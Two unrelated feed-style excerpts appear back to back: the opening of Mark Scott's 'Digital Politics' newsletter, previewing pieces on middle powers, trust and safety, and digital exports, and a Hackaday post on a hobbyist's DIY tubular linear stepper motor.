HELO, GWLEIDYDDIAETH DDIGIDOL YW HYN. For those who don't speak Welsh (like me), that's 'Hello, this is Digital Politics." I'm Mark Scott, and this edition comes to you from an unseasonably warm (well, for the United Kingdom) Welsh coastal village. Normal transmission will resume next week.

— The digital world is increasingly divided between Great Powers. That has left a lot of room for so-called 'middle powers' to exert outsized influence.

— The world of trust and safety is wading through treacherous political waters that will leave many caught between rival national governments.

— Ahead of pending US tariffs to be announced on April 2, it's worth remembering global digital exports have doubled over the last 10 years.

Let's get started.

digitalpolitics.co/newsletter0…

We’ve seen plenty of motor projects, but [Jeremy]’s DIY Tubular Linear Motor is a really neat variety of stepper motor in a format we certainly don’t see every day. It started as a design experiment in making a DIY reduced noise, gearless actuator and you can see the result here.

Here’s how it works: the cylindrical section contains permanent magnets, and it slides back and forth through the center of a row of coils depending on how those coils are energized. In a way, it’s what one would get by unrolling a typical rotary stepper motor. The result is a gearless (and very quiet) linear actuator that controls like a stepper motor.

While a tubular linear motor is at its heart a pretty straightforward concept, [Jeremy] found very little information on how to actually go about making one from scratch. [Jeremy] acknowledges he’s no expert when it comes to motor design or assembly, but he didn’t let that stop him from iterating on the concept (which included figuring out optimal coil design and magnet spacing and orientation) until he was satisfied. We love to see this kind of learning process centered around exploring an idea.

We’ve seen DIY linear motors embedded in PCBs and even seen them pressed into service as model train tracks, but this is the first time we can recall seeing a tubular format.

Watch it in action in the short video embedded below, and dive into the project log that describes how it works for added detail.

youtube.com/embed/AWICzArr4r8?…

hackaday.com/2025/03/31/diy-li…